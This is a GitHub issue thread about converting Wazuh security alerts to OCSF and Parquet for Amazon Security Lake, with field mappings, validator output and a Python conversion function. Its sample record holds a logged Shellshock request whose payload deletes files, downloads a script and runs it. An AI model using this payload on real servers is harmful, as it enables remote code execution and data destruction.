Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Amazon Security Lake integration - Data transform and delivery (DTD) #145

Closed
5 tasks done
Tracked by #128
AlexRuiz7 opened this issue Jan 31, 2024 · 3 comments
Closed
5 tasks done
Tracked by #128
Labels
level/task Task issue type/enhancement Enhancement issue

Comments

@AlexRuiz7
Copy link
Member

AlexRuiz7 commented Jan 31, 2024

Description

Now that we know how OCSF works, how to encode data in Parquet and how to implement a Logstash pipeline to send events to an S3 bucket from wazuh-indexer indexes, we need to bundle it all together and prepare the data before sending it to AWS.

As explained in #113, we need to somehow transform the data during the pipeline, to later on upload it to the Amazon Security Lake S3 bucket already in OCSF and Parquet.

To transform the data, we'll explore the use of a Lambda function and a Python script. The main difference about these 2 approaches is the resources required, as the first one needs an auxiliary S3 bucket.

Tasks

Subtasks

Definition of done

These two proposals will be worked in parallel. As soon as we manage to get one of these workings, we can consider this issue completed. Once that happens, we'll discuss the next steps.

@kclinden
Copy link

Has sending the data to a Kinesis Firehose with data transformation to parquet been considered?
https://docs.aws.amazon.com/firehose/latest/dev/record-format-conversion.html

@AlexRuiz7
Copy link
Member Author

Together with @wazuh/threat-intel team, we have worked on generating mappings to transform our data to the OCSF schema. In order to do that, we'll use the Detection Finding (2004) class, added in the v1.1.0 release of OCSF. The first proposal was to use the Security Finding (2001) class, but was discarded due to its deprecation on the latest version of OCSF.

OCSF Version: 1.1.0

OCSF Value
category_uid 2
category_name Findings
class_uid 2004
class_name Detection Finding
type_uid 200401
metadata.product.name Wazuh
metadata.product.vendor_name Wazuh, Inc,.
metadata.product.version 4.9.0
metadata.product.lang en
metadata.log_name Security events
metadata.log_provider Wazuh
OCSF (2004) Wazuh event field
activity_id 1
time timestamp
message rule.description
count rule.firedtimes
finding_info.uid id
finding_info.title rule.description
finding_info.types input.type
finding_info.analytic.category rule.groups
finding_info.analytic.name decoder.name
finding_info.analytic.type Rule
finding_info.analytic.type_id 1
finding_info.analytic.uid rule.id
risk_score rule.level
finding_info.attacks.tactic.name rule.mitre.tactic
finding_info.attacks.technique.name rule.mitre.technique
finding_info.attacks.technique.uid rule.mitre.technique
finding_info.attacks.version v13.1
unmapped rule.nist_800_53
severity_id convert(rule.level)
status_id 99
resources.name agent.name
resources.uid agent.id
unmapped ['_index', 'location', 'manager.name']
raw_data full_log

Originally posted by @IsExec in https://github.com/wazuh/internal-devel-requests/issues/699#issuecomment-1933401673

To test these mappings work and lead our data to be OCSF compliant, we have used the validate tool from amazon-security-lake-ocsf-validation, which had to be updated (link redirects to the updated version), together with the CLI Python module parquet-tools.

parquet-tools show parquet/wazuh-event.ocsf.parquet
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
|   activity_id | category_name   |   category_uid | class_name        |   class_uid |   count | message                   | finding_info                                                                                                                                                                                                                                                                                                                                                                                                                           | metadata                                                                                                                                                | raw_data                                                                                                                                                                                                                | resources                                |   risk_score |   severity_id |   status_id | time                         |   type_uid | unmapped                                                                            |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
|             1 | Findings        |              2 | Detection Finding |        2004 |       1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] |            6 |             6 |          99 | 2024-02-08T11:35:14.334-0300 |     200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
|               |                 |                |                   |             |         |                           |                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                         |                                                                                                                                                                                                                         |                                          |              |               |             |                              |            |        'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)}       |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
python validate.py -i ../../wazuh-indexer/integrations/amazon-security-lake/parquet/output -version ocsf_schema_1.1.0
Attempting to Validate File: wazuh-event.ocsf.parquet...

Validating Against Event Class: detection_finding (2004)...

VALID OCSF.
Python mappings to OCSF

#!/usr/bin/python

# event comes from Filebeat
event = {}


def normalize(level: int) -> int:
    """
    Normalizes rule level into the 0-6 range, required by OCSF.
    """
    # TODO normalization
    return level


def join(iterable, separator=","):
    return (separator.join(iterable))


def convert(event: dict) -> dict:
    """
    Converts Wazuh events to OCSF's Detecting Finding (2004) class.
    """
    ocsf_class_template = \
        {
            "activity_id": 1,
            "category_name": "Findings",
            "category_uid": 2,
            "class_name": "Detection Finding",
            "class_uid": 2004,
            "count": event["_source"]["rule"]["firedtimes"],
            "message": event["_source"]["rule"]["description"],
            "finding_info": {
                "analytic": {
                    "category": join(event["_source"]["rule"]["groups"]),
                    "name": event["_source"]["decoder"]["name"],
                    "type_id": 1,
                    "uid": event["_source"]["rule"]["id"],
                },
                "attacks": {
                    "tactic": {
                        "name": join(event["_source"]["rule"]["mitre"]["tactic"]),
                    },
                    "technique": {
                        "name": join(event["_source"]["rule"]["mitre"]["technique"]),
                        "uid": join(event["_source"]["rule"]["mitre"]["id"]),
                    },
                    "version": "v13.1"
                },
                "title": event["_source"]["rule"]["description"],
                "types": [
                    event["_source"]["input"]["type"]
                ],
                "uid": event["_source"]['id']
            },
            "metadata": {
                "log_name": "Security events",
                "log_provider": "Wazuh",
                "product": {
                    "name": "Wazuh",
                    "lang": "en",
                    "vendor_name": "Wazuh, Inc,."
                },
                "version": "1.1.0",
            },
            "raw_data": event["_source"]["full_log"],
            "resources": [
                {
                    "name": event["_source"]["agent"]["name"],
                    "uid": event["_source"]["agent"]["id"]
                },
            ],
            "risk_score": event["_source"]["rule"]["level"],
            "severity_id": normalize(event["_source"]["rule"]["level"]),
            "status_id": 99,
            "time": event["_source"]["timestamp"],
            "type_uid": 200401,
            "unmapped": {
                "data_sources": [
                    event["_index"],
                    event["_source"]["location"],
                    event["_source"]["manager"]["name"]
                ],
                "nist": event["_source"]["rule"]["nist_800_53"],  # Array
            }
        }

    return ocsf_class_template

@AlexRuiz7
Copy link
Member Author

I'm working on an event generator tool to test the integration and ease its development.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
level/task Task issue type/enhancement Enhancement issue
Projects
No open projects
Status: Done
Development

No branches or pull requests

2 participants